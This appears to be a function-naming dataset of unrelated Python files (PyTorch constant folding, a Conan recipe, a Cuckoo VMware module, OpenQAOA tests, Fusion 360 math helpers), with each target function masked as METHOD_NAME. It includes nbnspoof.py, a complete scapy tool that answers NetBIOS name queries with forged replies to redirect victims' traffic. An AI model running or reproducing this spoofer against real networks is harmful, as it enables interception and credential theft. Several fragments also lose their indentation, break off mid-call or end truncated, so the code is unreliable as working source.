        if o != 0:
            return bool(self._tab.Get(flatbuffers.number_types.BoolFlags, o + self._tab.Pos))
        return False
# Builder helpers (generated): Start/Add*/End mirror the table slots above.
# The LSTMOptions*-prefixed variants are deprecated aliases kept for
# backwards compatibility.
def Start(builder): builder.StartObject(5)
def LSTMOptionsStart(builder):
    """This method is deprecated. Please switch to Start."""
    return Start(builder)
def AddFusedActivationFunction(builder, fusedActivationFunction): builder.PrependInt8Slot(0, fusedActivationFunction, 0)
def LSTMOptionsAddFusedActivationFunction(builder, fusedActivationFunction):
    """This method is deprecated. Please switch to AddFusedActivationFunction."""
    return AddFusedActivationFunction(builder, fusedActivationFunction)
def AddCellClip(builder, cellClip): builder.PrependFloat32Slot(1, cellClip, 0.0)
def LSTMOptionsAddCellClip(builder, cellClip):
    """This method is deprecated. Please switch to AddCellClip."""
    return AddCellClip(builder, cellClip)
def METHOD_NAME(builder, projClip): builder.PrependFloat32Slot(2, projClip, 0.0)
def LSTMOptionsAddProjClip(builder, projClip):
    """This method is deprecated. Please switch to AddProjClip."""
    return METHOD_NAME(builder, projClip)
def AddKernelType(builder, kernelType): builder.PrependInt8Slot(3, kernelType, 0)
def LSTMOptionsAddKernelType(builder, kernelType):
    """This method is deprecated. Please switch to AddKernelType."""
    return AddKernelType(builder, kernelType)
def AddAsymmetricQuantizeInputs(builder, asymmetricQuantizeInputs): builder.PrependBoolSlot(4, asymmetricQuantizeInputs, 0)
def LSTMOptionsAddAsymmetricQuantizeInputs(builder, asymmetricQuantizeInputs):
    """This method is deprecated. Please switch to AddAsymmetricQuantizeInputs."""
    return AddAsymmetricQuantizeInputs(builder, asymmetricQuantizeInputs)
def LSTMOptionsEnd(builder):
"""This method is deprecated. Please switch to End."""
return End(builder |
298,407 | is impure | import collections
from typing import Any, Dict
import torch
import torch.utils._pytree as pytree
aten = torch.ops.aten
def replace_node_with_constant(gm, node, constant):
    """Replace ``node`` in ``gm``'s graph with a get_attr that reads ``constant``.

    The constant is stored on the module as a ``_frozen_param<N>`` buffer;
    ``gm._frozen_param_count`` tracks the next candidate index across calls.
    """
    graph = gm.graph

    if not hasattr(gm, "_frozen_param_count"):
        gm._frozen_param_count = 0
    # Find the first unused _frozen_param<N> attribute name.
    idx = gm._frozen_param_count
    qualname = f"_frozen_param{idx}"
    while hasattr(gm, qualname):
        idx += 1
        qualname = f"_frozen_param{idx}"
    gm._frozen_param_count = idx + 1

    with graph.inserting_before(node):
        getattr_node = graph.create_node("get_attr", qualname, (), {})
    node.replace_all_uses_with(getattr_node)
    getattr_node.meta.update(node.meta)
    graph.erase_node(node)

    # needed to suppress `does not reference an nn.Module, nn.Parameter, or buffer` warning
    gm.register_buffer(qualname, constant)
    setattr(gm, qualname, constant)
class ConstantFolder(torch.fx.Interpreter):
    def __init__(
        self,
        gm,
        skip_constructors=False,
    ):
        """Interpreter that walks ``gm`` looking for statically computable nodes.

        :param gm: the ``torch.fx.GraphModule`` to analyze.
        :param skip_constructors: when True, constructor-like ops are not folded.
        """
        super().__init__(gm)
        # Nodes chosen for folding, mapped to their computed constant values.
        self.node_replacements: Dict[torch.fx.Node, Any] = {}
        # Count of replaced uses per node.
        self.replaced_uses: Dict[torch.fx.Node, int] = collections.Counter()
        # Sentinel marking values that cannot be constant-folded.
        self.unknown_value = object()
        self.skip_constructors: bool = skip_constructors

        # overwrite this to deallocate env values if their only remaining use
        # is the output
        self.user_to_last_uses = self.node_to_last_non_output_use()
def METHOD_NAME(self, node: torch.fx.node.Node):
if node.target == torch.ops.quantized_decomposed.dequantize_per_channel.default:
# For the pattern fp32_weight -> quantized_decomposed.quantize_per_channel.default
# -> quantized_decomposed.dequantize_per_channel.default
# We only folding fp32_weight -> quantized_decomposed.quantize_per_channel.default into
# int8_weight and leave quantized_decomposed.dequantize_per_channel.default in graph to be fused
return True
return False
def node_to_last_non_output_use(self):
last_non_output_use = collections.defaultdict(list)
seen_uses = set()
output_node = next(iter(reversed(self.module.graph.nodes)))
for node in reversed(self.module.graph.nodes):
if node.target == "output":
continue
def add_use(inp):
if inp in seen_uses:
return
seen_uses.add(inp)
last_non_output_use[node].append(inp)
pytree.tree_map_only(torch.fx.Node, add_use, (node.args, node.kwargs))
# if this node is only used in output, we want to gc it right away
if len(node.users) == 1 and output_node in node.users:
last_non_output_use[node].append(node)
return last_non_output_use
def run_node(self, node):
if node.target == "output":
# because we remove nodes from env on last non output use,
# re-define them now or we'll get error in interpreter
def set_env(arg):
self.env[arg] = self.unknown_value
pytree.tree_map_only(torch.fx.Node, set_env, node.args)
return super().run_node(node)
args, kwargs = self.fetch_args_kwargs_from_env(node)
flattened_inputs = pytree.tree_flatten((args, kwargs))[0]
if self.unknown_value in flattened_inputs:
return self.unknown_value
# TODO - fix errors with this
if (
node.op == "call_function"
and node.target == aten._efficientzerotensor.default
):
return self.unknown_value
# skip constructors, since inductor generates optimal code for them already
# and turning into tensor would result in an additional global memory read
# TODO - more complicated strategy
if (
self.skip_constructors
and node.op != "get_attr"
and not any(isinstance(e, torch.Tensor) for e in flattened_inputs)
):
return self.unknown_value
# All mutations should either be removed or on inputs which we did not make constant
if (
isinstance(node.target, torch._ops.OpOverload)
and torch.Tag.nondeterministic_seeded in node.target.tags
):
return self.unknown_value
out = super().run_node(node)
if node.op != "get_attr" and isinstance(out, torch.Tensor):
if not self.insertable_tensor_check(out):
return out
if self.METHOD_NAME(node):
return self.unknown_value
self.add_node_replacement(node, out)
flattened_node_inps = pytree.tree_flatten((node.args, node.kwargs))[0]
for n in flattened_node_inps:
if not isinstance(n, torch.fx.Node):
continue
self.replaced_uses[n] += 1
for to_delete in self.user_to_last_uses.get(node, []):
if self.replaced_uses[to_delete] == len(to_delete.users):
self.node_replacements.pop(to_delete, None)
return out
def insertable_tensor_check(self, tensor: torch.Tensor) -> bool:
return True
def add_node_replacement(self, node: torch.fx.Node, tensor: torch.Tensor) -> None:
self.node_replacements[node] = tensor
def run(self):
env = {}
for n in self.module.graph.nodes:
if n.op == "placeholder":
env[n] = self.unknown_value
return super().run(initial_env=env)
@torch.utils._python_dispatch._disable_current_modes()
def constant_fold(gm):
    """Constant-fold ``gm`` in place.

    Runs :class:`ConstantFolder`, materializes every foldable node as a frozen
    attribute, garbage-collects now-unused ``get_attr`` nodes, and recompiles
    the module. Dispatch modes are disabled so folding runs on real tensors.
    """
    cf = ConstantFolder(gm, skip_constructors=True)
    cf.run()
    for node, constant in cf.node_replacements.items():
        replace_node_with_constant(gm, node, constant)
    # Drop get_attr nodes (and their backing attributes) with no remaining users.
    erased_params = []
    for node in gm.graph.nodes:
        if node.op == "get_attr" and len(node.users) == 0:
            delattr(gm, node.target)
            erased_params.append(node)
    for node in erased_params:
        gm.graph.erase_node(node)
    gm.graph.eliminate_dead_code()
    gm.graph.lint()
    gm.recompile()
298,408 | fix msvc libname | from conan import ConanFile
from conan.tools.apple import fix_apple_shared_install_name
from conan.tools.env import VirtualBuildEnv
from conan.tools.files import apply_conandata_patches, copy, export_conandata_patches, get, rm, rmdir
from conan.tools.gnu import PkgConfigDeps
from conan.tools.layout import basic_layout
from conan.tools.meson import Meson, MesonToolchain
import os
required_conan_version = ">=1.53.0"
class LibPslConan(ConanFile):
    """Conan recipe for libpsl, the C library for the Public Suffix List."""

    name = "libpsl"
    description = "C library for the Public Suffix List"
    homepage = "https://github.com/rockdaboot/libpsl"
    topics = ("psl", "suffix", "TLD", "gTLD", ".com", ".net")
    license = "GPL-2.0-or-later"
    url = "https://github.com/conan-io/conan-center-index"
    package_type = "library"
    settings = "os", "arch", "compiler", "build_type"
    options = {
        "shared": [True, False],
        "fPIC": [True, False],
        "with_idna": [False, "icu", "libidn", "libidn2"],
    }
    default_options = {
        "shared": False,
        "fPIC": True,
        "with_idna": "icu",
    }

    def export_sources(self):
        # Ship the conandata patches alongside the recipe.
        export_conandata_patches(self)

    def config_options(self):
        # fPIC has no meaning on Windows.
        if self.settings.os == "Windows":
            del self.options.fPIC

    def configure(self):
        if self.options.shared:
            self.options.rm_safe("fPIC")
        # Pure C library: C++ settings do not affect the package id.
        self.settings.rm_safe("compiler.cppstd")
        self.settings.rm_safe("compiler.libcxx")

    def layout(self):
        basic_layout(self, src_folder="src")

    def requirements(self):
        # Select the IDNA backend requested via the with_idna option.
        if self.options.with_idna == "icu":
            self.requires("icu/72.1")
        elif self.options.with_idna == "libidn":
            self.requires("libidn/1.36")
        elif self.options.with_idna == "libidn2":
            self.requires("libidn2/2.3.0")
        if self.options.with_idna in ("libidn", "libidn2"):
            self.requires("libunistring/0.9.10")

    def build_requirements(self):
        self.tool_requires("meson/1.0.0")
        # Only provide pkgconf when the user has not configured a pkg-config tool.
        if not self.conf.get("tools.gnu:pkg_config", check_type=str):
            self.tool_requires("pkgconf/1.9.3")

    def source(self):
        get(self, **self.conan_data["sources"][self.version], strip_root=True)

    @property
    def _idna_option(self):
        # Translate the conan option value into meson's expected spelling.
        return {
            "False": "no",
            "icu": "libicu",
        }.get(str(self.options.with_idna), str(self.options.with_idna))

    def generate(self):
        env = VirtualBuildEnv(self)
        env.generate()
        tc = MesonToolchain(self)
        tc.project_options["runtime"] = self._idna_option
        tc.project_options["builtin"] = self._idna_option
        tc.generate()
        deps = PkgConfigDeps(self)
        deps.generate()

    def build(self):
        apply_conandata_patches(self)
        meson = Meson(self)
        meson.configure()
        meson.build()

    def package(self):
        copy(self, "COPYING", src=self.source_folder, dst=os.path.join(self.package_folder, "licenses"))
        copy(self, "LICENSE", src=self.source_folder, dst=os.path.join(self.package_folder, "licenses"))
        meson = Meson(self)
        meson.install()
        # Strip debug databases and the meson-generated pkg-config files.
        rm(self, "*.pdb", os.path.join(self.package_folder, "bin"))
        rmdir(self, os.path.join(self.package_folder, "lib", "pkgconfig"))
        fix_apple_shared_install_name(self)
        METHOD_NAME(self)

    def package_info(self):
        self.cpp_info.set_property("pkg_config_name", "libpsl")
        self.cpp_info.libs = ["psl"]
        if self.settings.os == "Windows":
            self.cpp_info.system_libs = ["ws2_32"]
        if not self.options.shared:
            # Consumers need PSL_STATIC defined to link the static library correctly.
            self.cpp_info.defines = ["PSL_STATIC"]
def METHOD_NAME(conanfile, remove_lib_prefix=True):
    """remove lib prefix & change extension to .lib in case of cl like compiler"""
    from conan.tools.files import rename
    import glob
    # Only compilers with an MSVC-style runtime setting need the rename.
    if not conanfile.settings.get_safe("compiler.runtime"):
        return
    libdirs = getattr(conanfile.cpp.package, "libdirs")
    for libdir in libdirs:
        full_folder = os.path.join(conanfile.package_folder, libdir)
        for ext in (".dll.a", ".dll.lib", ".a"):
            for filepath in glob.glob(os.path.join(full_folder, "*" + ext)):
                libname = os.path.basename(filepath)[: -len(ext)]
                if remove_lib_prefix and libname.startswith("lib"):
                    libname = libname[3:]
                target = os.path.join(os.path.dirname(filepath), libname + ".lib")
                rename(conanfile, filepath, target)
298,409 | stop | import json
import logging
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from lib.cuckoo.common.abstracts import Machinery
from lib.cuckoo.common.exceptions import CuckooMachineError
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
log = logging.getLogger(__name__)
s = requests.Session()
s.verify = False
class VMwareREST(Machinery):
    """Virtualization layer for remote VMware REST Server."""

    # Machines are addressed by the "id" field of their configuration entry.
    LABEL = "id"

    def _initialize_check(self):
        """Check for configuration file and vmware setup.
        @raise CuckooMachineError: if configuration is missing or wrong.
        """
        if not self.options.vmwarerest.host:
            raise CuckooMachineError("VMwareREST hostname/IP address missing, please add it to vmwarerest.conf")
        self.host = self.options.vmwarerest.host
        if not self.options.vmwarerest.port:
            raise CuckooMachineError("VMwareREST server port address missing, please add it to vmwarerest.conf")
        self.port = str(self.options.vmwarerest.port)
        if not self.options.vmwarerest.username:
            raise CuckooMachineError("VMwareREST username missing, please add it to vmwarerest.conf")
        self.username = self.options.vmwarerest.username
        if not self.options.vmwarerest.password:
            raise CuckooMachineError("VMwareREST password missing, please add it to vmwarerest.conf")
        self.password = self.options.vmwarerest.password
        super(VMwareREST, self)._initialize_check()
        log.info("VMwareREST machinery module initialised (%s:%s)", self.host, self.port)

    def get_vms(self):
        """Fetch all VMs from the REST API; returns parsed JSON, or None on auth failure."""
        vms = s.get(f"https://{self.host}:{self.port}/api/vms", auth=(self.username, self.password))
        if "Authentication failed" in vms.text:
            log.info("Authentication failed, please check credentials in vmwarerest.conf")
            return None
        return vms.json()

    def get_vmmoid(self, id):
        """Resolve a VM label to the server-side id by matching the .vmx path suffix."""
        vms = self.get_vms()
        if vms:
            for vm in vms:
                if vm["path"].endswith(f"{id}.vmx"):
                    return vm["id"]
        log.info("There was a problem getting vmmoid for vm %s", id)

    def set_vm_settings(self, id):
        """Send a settings PUT for the VM.

        NOTE(review): the request body is an empty JSON object, and the
        "problem" message below is logged even after a successful PUT —
        confirm both are intentional.
        """
        vmmoid = self.get_vmmoid(id)
        if vmmoid:
            status = s.put(
                f"https://{self.host}:{self.port}/api/vms/{vmmoid}",
                data=json.dumps({}),
                auth=(self.username, self.password),
            )
            if "Authentication failed" in status.text:
                log.info("Authentication failed, please check credentials in vmwarerest.conf")
                return None
        log.info("There was a problem setting settings for vm %s", id)

    def get_vm_settings(self, id):
        """Return the raw settings response for the VM, or None if lookup failed."""
        vmmoid = self.get_vmmoid(id)
        if vmmoid:
            return s.get(
                f"https://{self.host}:{self.port}/api/vms/{vmmoid}",
                auth=(self.username, self.password),
            )
        log.info("There was a problem getting settings for vm %s", id)

    def poweron_vm(self, id):
        """Request power-on for the VM; returns the response, or None on auth failure."""
        vmmoid = self.get_vmmoid(id)
        if vmmoid:
            log.info("Powering on vm %s", id)
            status = s.put(
                f"https://{self.host}:{self.port}/api/vms/{vmmoid}/power",
                auth=(self.username, self.password),
                data="on",
                headers={"content-type": "application/vnd.vmware.vmw.rest-v1+json"},
            )
            if "Authentication failed" in status.text:
                log.info("Authentication failed, please check credentials in vmwarerest.conf")
                return None
            return status
        log.info("There was a problem powering on vm %s", id)

    def poweroff_vm(self, id):
        """Request power-off for the VM; returns the raw response."""
        vmmoid = self.get_vmmoid(id)
        if vmmoid:
            log.info("Powering off vm %s", id)
            return s.put(
                f"https://{self.host}:{self.port}/api/vms/{vmmoid}/power",
                auth=(self.username, self.password),
                data="off",
                headers={"content-type": "application/vnd.vmware.vmw.rest-v1+json"},
            )
        log.info("There was a problem powering off vm %s", id)

    def get_power_for_vm(self, id):
        """Return the raw power-state response for the VM, or None if lookup failed."""
        vmmoid = self.get_vmmoid(id)
        if vmmoid:
            return s.get(
                f"https://{self.host}:{self.port}/api/vms/{vmmoid}/power",
                auth=(self.username, self.password),
            )
        log.info("There was a problem querying power status for vm %s", id)

    def start(self, id):
        """Start an analysis machine: stop it first if running, then power on."""
        log.info("Starting vm %s", id)
        self.METHOD_NAME(id)
        self.poweron_vm(id)

    def METHOD_NAME(self, id):
        """Stop the machine, but only if it is currently powered on."""
        if self._is_running(id):
            log.info("Stopping vm %s", id)
            self.poweroff_vm(id)

    def _revert(self, id, snapshot):
        """Revert the machine for the next analysis.

        NOTE(review): this only powers the VM off; the snapshot argument is
        never used to restore state — confirm this is the intended behavior.
        """
        log.info("Revert snapshot for vm %s: %s", id, snapshot)
        self.poweroff_vm(id)

    def _is_running(self, id):
        """Return a truthy value (the id) when the VM reports poweredOn."""
        log.info("Checking vm %s", id)
        power_state = self.get_power_for_vm(id)
        if power_state and "poweredOn" in power_state.text:
            log.info("Vm %s is running", id)
            return id
        else:
            log.info("Vm %s is not running", id)
298,410 | test portfoliooptimization terms weights constant | import unittest
import numpy as np
from openqaoa.problems import PortfolioOptimization
def terms_list_equality(terms_list1, terms_list2):
    """
    Check the terms equality between two terms list
    where the order of edges do not matter.
    """
    if len(terms_list1) != len(terms_list2):
        return False
    # Every pair must match, either directly or with the edge reversed.
    # The previous loop kept only the result of the LAST pair (and raised
    # NameError for two empty lists); `all` checks every pair and returns
    # True for two empty lists.
    return all(
        term1 == term2 or term1 == term2[::-1]
        for term1, term2 in zip(terms_list1, terms_list2)
    )
def terms_list_isclose(terms_list1, terms_list2):
    """
    Check whether two terms lists are numerically close,
    where the order of edges do not matter.
    """
    if len(terms_list1) != len(terms_list2):
        return False
    # Every pair must be close, either directly or with the edge reversed.
    # The previous loop kept only the result of the LAST pair and raised
    # NameError for two empty lists; np.all also makes multi-element terms
    # unambiguous (a bare multi-element boolean array is not truthy).
    return all(
        bool(np.all(np.isclose(term1, term2)))
        or bool(np.all(np.isclose(term1, term2[::-1])))
        for term1, term2 in zip(terms_list1, terms_list2)
    )
class TestPortfolioOptimization(unittest.TestCase):
    """Tests for PortfoliaOptimization class"""

    def METHOD_NAME(self):
        """Test terms,weights,constant of QUBO generated by PortfolioOptimization class"""
        # Expected QUBO for a uniform 3-asset instance (all mu and sigma equal).
        po_terms = [[0, 1], [0, 2], [1, 2], [0], [1], [2]]
        po_weights = [0.505, 0.505, 0.505, 0.535, 0.535, 0.535]
        po_constant = 0.8799999999999999
        mu = [0.1, 0.1, 0.1]
        sigma = [[0.01, 0.01, 0.01], [0.01, 0.01, 0.01], [0.01, 0.01, 0.01]]
        risk_factor = 0.1
        budget = 2
        penalty = 1
        qubo = PortfolioOptimization(mu, sigma, risk_factor, budget, penalty).qubo
        terms, weights = qubo.terms, qubo.weights
        constant = qubo.constant
        self.assertEqual(weights, po_weights)
        self.assertEqual(terms, po_terms)
        self.assertEqual(po_constant, constant)

    def test_portfoliooptimization_random_instance(self):
        """Test random instance method of PortfolioOptimization problem class"""
        seed = 1234
        rng = np.random.default_rng(seed)
        num_assets = 3
        risk_factor = 0.1
        budget = 2
        penalty = 1
        mu_bounds = [-0.1, 0.1]
        sigma_bounds = [-0.01, 0.01]
        # Reproduce the same RNG draws random_instance() is expected to make.
        mu = [
            (mu_bounds[1] - mu_bounds[0]) * rng.random() + mu_bounds[0]
            for _ in range(num_assets)
        ]
        sigma = [[0 for i in range(num_assets)] for j in range(num_assets)]
        for i in range(num_assets):
            for j in range(num_assets):
                sigma[i][j] = (
                    sigma_bounds[1] - sigma_bounds[0]
                ) * rng.random() + sigma_bounds[0]
        qubo = PortfolioOptimization(mu, sigma, risk_factor, budget, penalty).qubo
        qubo_random = PortfolioOptimization.random_instance(
            mu_bounds=mu_bounds,
            sigma_bounds=sigma_bounds,
            risk_factor=risk_factor,
            budget=budget,
            seed=seed,
            penalty=penalty,
            num_assets=num_assets,
        ).qubo
        self.assertEqual(qubo.weights, qubo_random.weights)
        self.assertEqual(qubo.terms, qubo_random.terms)
        self.assertEqual(qubo.constant, qubo_random.constant)

    def test_portfoliooptimization_classical_sol(self):
        """Test the portfolio optimization set random instance method classical solution"""
        seed = 1234
        po_sol = PortfolioOptimization.random_instance(
            num_assets=10, seed=seed
        ).classical_solution()
        # Known-good solution for this seed.
        sol = {
            "asset_0": 1.0,
            "asset_1": 1.0,
            "asset_2": 1.0,
            "asset_3": 0,
            "asset_4": 0,
            "asset_5": 0,
            "asset_6": 0,
            "asset_7": 1.0,
            "asset_8": 1.0,
            "asset_9": 0,
        }
        self.assertEqual(po_sol, sol)

    def test_portfoliooptimization_plot(self):
        """Test portfolio optimization random instance method"""
        import matplotlib.pyplot as plt

        seed = 1234
        portfoliooptimization_random_prob = PortfolioOptimization.random_instance(
            num_assets=12, budget=8, seed=seed
        )
        sol = portfoliooptimization_random_prob.classical_solution()
        figure = portfoliooptimization_random_prob.plot_solution(sol)
        self.assertTrue(isinstance(figure, plt.Figure))
        # When an axes is supplied, plot_solution draws into it and returns None.
        fig, ax = plt.subplots(figsize=(5, 5))
        self.assertTrue(
            portfoliooptimization_random_prob.plot_solution(sol, ax=ax) == None
        )
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
298,411 | usage | #!/usr/bin/env python2
#
# nbnspoof.py
# 03-27-2007
# Robert Wesley McGrew
# wesley@mcgrewsecurity.com
#
# http://mcgrewsecurity.com
#
# Keeping things simple: You may use this code however you see fit, so
# long as you give me proper credit. Email me if you have any
# questions.
import sys
import getopt
import re
from scapy import *
global verbose
global regexp
global ip
global interface
global mac_addr
def METHOD_NAME():
    # Print the command-line usage text for the spoofer.
    print """Usage:
 nbnspoof.py [-v] -i <interface> -n <regexp> -h <ip address> -m <MAC>
    -v Verbose output of sniffed NBNS name queries, and responses sent
    -i The interface you want to sniff and send on
    -n A regular expression applied to each query to determine whether a
       spoofed response will be sent
    -h The IP address that will be sent in spoofed responses
    -m The source MAC address for spoofed responses
"""
    return
def pack_ip(addr):
    # Build a scapy IP layer with addr as source and slice out the 4 raw
    # source-address bytes (offsets 0x0c-0x10 of the serialized IP header).
    temp = IP(src=addr)
    return str(temp)[0x0c:0x10]
def unpack_ip(bin):
    # Splice the 4 packed bytes into a fresh IP header at the source-address
    # offset (0x0c-0x10) and let scapy parse the dotted-quad back out.
    temp = IP()
    temp = str(temp)[:0x0c] + bin + str(temp)[0x10:]
    temp = IP(temp)
    return temp.src
def get_packet(pkt):
    # Sniffer callback: log NBNS traffic and answer matching name queries
    # with a spoofed positive response that points at our IP.
    global verbose
    global regexp
    global ip
    global interface
    global mac_addr
    if not pkt.getlayer(NBNSQueryRequest):
        return
    # The high bit of FLAGS marks the packet as a response rather than a query.
    if pkt.FLAGS & 0x8000:
        query = False
        addr = unpack_ip(str(pkt.getlayer(Raw))[8:])
    else:
        query = True
    if verbose:
        print str(pkt.NAME_TRN_ID) + ":",
        if query:
            print "Q",
        else:
            print "R",
        print "SRC:" + pkt.getlayer(IP).src + " DST:" + pkt.getlayer(IP).dst,
        if query:
            print 'NAME:"' + pkt.QUESTION_NAME + '"'
        else:
            print 'NAME:"' + pkt.QUESTION_NAME + '"',
            print 'IP:' + addr
    # NOTE(review): match() is called with pos=1, so matching starts at the
    # second character of the queried name — confirm this offset is intended.
    if query and regexp.match(pkt.QUESTION_NAME.rstrip(),1):
        # Craft a spoofed positive response, mirroring the query's transaction
        # id, name and suffix so the victim accepts it.
        response = Ether(dst=pkt.src,src=mac_addr)
        response /= IP(dst=pkt.getlayer(IP).src,src=ip)
        response /= UDP(sport=137,dport=137)
        response /= NBNSQueryRequest(NAME_TRN_ID=pkt.getlayer(NBNSQueryRequest).NAME_TRN_ID,\
                                     FLAGS=0x8500,\
                                     QDCOUNT=0,\
                                     ANCOUNT=1,\
                                     NSCOUNT=0,\
                                     ARCOUNT=0,\
                                     QUESTION_NAME=pkt.getlayer(NBNSQueryRequest).QUESTION_NAME,\
                                     SUFFIX=pkt.getlayer(NBNSQueryRequest).SUFFIX,\
                                     NULL=0,\
                                     QUESTION_TYPE=pkt.getlayer(NBNSQueryRequest).QUESTION_TYPE,\
                                     QUESTION_CLASS=pkt.getlayer(NBNSQueryRequest).QUESTION_CLASS)
        response /= Raw()
        # Time to live: 3 days, 11 hours, 20 minutes
        response.getlayer(Raw).load += '\x00\x04\x93\xe0'
        # Data length: 6
        response.getlayer(Raw).load += '\x00\x06'
        # Flags: (B-node, unique)
        response.getlayer(Raw).load += '\x00\x00'
        # The IP we're giving them:
        response.getlayer(Raw).load += pack_ip(ip)
        sendp(response,iface=interface,verbose=0)
        if verbose:
            print 'Sent spoofed reply to #' + str(response.getlayer(NBNSQueryRequest).NAME_TRN_ID)
    return
def main():
    # Parse command-line options, compile the name filter, and start sniffing.
    global verbose
    global regexp
    global ip
    global interface
    global mac_addr
    try:
        opts, args = getopt.getopt(sys.argv[1:],"vi:n:h:m:")
    except:
        METHOD_NAME()
        sys.exit(1)
    verbose = False
    interface = None
    name_regexp = None
    ip = None
    mac_addr = None
    for o, a in opts:
        if o == '-v':
            verbose = True
        if o == '-i':
            interface = a
        if o == '-n':
            name_regexp = a
        if o == '-h':
            ip = a
        if o == '-m':
            mac_addr = a
    # All four value options are required; stray positional args are rejected.
    if args or not ip or not name_regexp or not interface or not mac_addr:
        METHOD_NAME()
        sys.exit(1)
    regexp = re.compile(name_regexp,re.IGNORECASE)
    # BPF filter restricts capture to NBNS (UDP/137); each packet is handed
    # to get_packet, and nothing is stored in memory (store=0).
    sniff(iface=interface,filter="udp and port 137",store=0,prn=get_packet)
    return
# Script entry point.
if __name__ == "__main__":
    main()
298,412 | rad to deg | import math, uuid
from adsk.core import Vector3D, Base
from adsk.fusion import Component, Occurrence
# from proto.proto_out import types_pb2
def guid_component(comp: Component) -> str:
    """Build an identifier for a component from its entity token and its id."""
    return "{}_{}".format(comp.entityToken, comp.id)
def guid_occurrence(occ: Occurrence) -> str:
    """Identifier for an occurrence: its entity token joined with its component's guid."""
    component_guid = guid_component(occ.component)
    return "{}_{}".format(occ.entityToken, component_guid)
def guid_none(_: None) -> str:
    """Fallback identifier: a freshly generated random UUID string."""
    fresh = uuid.uuid4()
    return str(fresh)
def fill_info(proto_obj, fus_object, override_guid=None) -> None:
    """Populate proto_obj.info from fus_object, optionally forcing the GUID."""
    construct_info(
        "",
        proto_obj,
        fus_object=fus_object,
        GUID=override_guid,
    )
def construct_info(name: str, proto_obj, version=5, fus_object=None, GUID=None) -> None:
    """Constructs a info object from either a name or a fus_object

    Args:
        name (str): possible name
        proto_obj: protobuf message whose ``info`` submessage is populated
        version (int, optional): version. Defaults to 5.
        fus_object (adsk object, optional): Autodesk Object with name param. Defaults to None.
        GUID (str, optional): Preset GUID. Defaults to None.

    Raises:
        ValueError: If name and fus_object are none
    """
    proto_obj.info.version = version
    # Prefer the Fusion object's own name; fall back to the explicit name.
    if fus_object is not None:
        proto_obj.info.name = fus_object.name
    elif name is not None:
        proto_obj.info.name = name
    else:
        raise ValueError("Cannot construct info from no name or fus_object")
    if GUID is not None:
        proto_obj.info.GUID = str(GUID)
    else:
        try:
            # attempt to get entity token
            proto_obj.info.GUID = fus_object.entityToken
        except Exception:
            # was a bare `except:` which also swallowed SystemExit and
            # KeyboardInterrupt; fall back to a fresh uuid on any failure
            proto_obj.info.GUID = str(uuid.uuid4())
# My previous function was a lot more optimized; however, I now realize the bug was that it did not work well with degrees.
def euler_to_quaternion(r):
    """Convert (yaw, pitch, roll) Euler angles in radians to an [x, y, z, w] quaternion."""
    yaw, pitch, roll = r[0], r[1], r[2]
    # Precompute the half-angle sines and cosines once.
    sy, cy = math.sin(yaw / 2), math.cos(yaw / 2)
    sp, cp = math.sin(pitch / 2), math.cos(pitch / 2)
    sr, cr = math.sin(roll / 2), math.cos(roll / 2)
    qx = sr * cp * cy - cr * sp * sy
    qy = cr * sp * cy + sr * cp * sy
    qz = cr * cp * sy - sr * sp * cy
    qw = cr * cp * cy + sr * sp * sy
    return [qx, qy, qz, qw]
def METHOD_NAME(rad):
    """Convert an angle from radians to degrees.

    Args:
        rad (float): angle in radians

    Returns:
        float: the same angle expressed in degrees
    """
    scaled = rad * 180
    return scaled / math.pi
def quaternion_to_euler(qx, qy, qz, qw):
    """Takes in quat values and converts to degrees
    - roll is x axis - atan2(2(qwqy + qzqw), 1-2(qy^2 + qz^2))
    - pitch is y axis - asin(2(qxqz - qwqy))
    - yaw is z axis - atan2(2(qxqw + qyqz), 1-2(qz^2+qw^3))
    Args:
        qx (float): quat_x
        qy (float): quat_y
        qz (float): quat_z
        qw (float): quat_w
    Returns:
        roll: x value in degrees
        pitch: y value in degrees
        yaw: z value in degrees
    """
    # roll
    sr_cp = 2 * ((qw * qx) + (qy * qz))
    cr_cp = 1 - (2 * ((qx * qx) + (qy * qy)))
    roll = math.atan2(sr_cp, cr_cp)
    # pitch
    sp = 2 * ((qw * qy) - (qz * qx))
    if abs(sp) >= 1:
        # clamp to +/-90 degrees to guard against numeric drift (gimbal lock)
        pitch = math.copysign(math.pi / 2, sp)
    else:
        pitch = math.asin(sp)
    # yaw
    sy_cp = 2 * ((qw * qz) + (qx * qy))
    cy_cp = 1 - (2 * ((qy * qy) + (qz * qz)))
    yaw = math.atan2(sy_cp, cy_cp)
    # convert to degrees
    roll = METHOD_NAME(roll)
    pitch = METHOD_NAME(pitch)
    yaw = METHOD_NAME(yaw)
    # round and return
    return round(roll, 4), round(pitch, 4), round(yaw, 4)
def throwZero():
    """Report that an invalid zero trace was encountered during quaternion computation.

    Raises:
        RuntimeError: always
    """
    message = (
        "While computing the quaternion the trace was reported as 0 which is invalid"
    )
    raise RuntimeError(message)
def spatial_to_quaternion(mat):
    """Takes a 1D Spatial Transform Matrix and derives rotational quaternion
    I wrote this however it is difficult to extensibly test so use with caution
    Args:
        mat (list): spatial transform matrix
    Raises:
        RuntimeError: matrix is not of the correct size
    Returns:
        x, y, z, w: float representation of quaternions
    """
    # Expects a flattened 4x4 matrix (16 elements); the four branches below
    # pick the numerically stable extraction based on the largest diagonal term.
    if len(mat) > 15:
        trace = mat[0] + mat[5] + mat[10]
        if trace > 0:
            s = math.sqrt(trace + 1.0) * 2
            if s == 0:
                throwZero()
            qw = 0.25 * s
            qx = (mat[9] - mat[6]) / s
            qy = (mat[2] - mat[8]) / s
            qz = (mat[4] - mat[1]) / s
        elif (mat[0] > mat[5]) and (mat[0] > mat[8]):
            s = math.sqrt(1.0 + mat[0] - mat[5] - mat[10]) * 2.0
            if s == 0:
                throwZero()
            qw = (mat[9] - mat[6]) / s
            qx = 0.25 * s
            qy = (mat[1] + mat[4]) / s
            qz = (mat[2] + mat[8]) / s
        elif mat[5] > mat[10]:
            s = math.sqrt(1.0 + mat[5] - mat[0] - mat[10]) * 2.0
            if s == 0:
                throwZero()
            qw = (mat[2] - mat[8]) / s
            qx = (mat[1] + mat[4]) / s
            qy = 0.25 * s
            qz = (mat[6] + mat[9]) / s
        else:
            s = math.sqrt(1.0 + mat[10] - mat[0] - mat[5]) * 2.0
            if s == 0:
                throwZero()
            qw = (mat[4] - mat[1]) / s
            qx = (mat[2] + mat[8]) / s
            qy = (mat[6] + mat[9]) / s
            qz = 0.25 * s
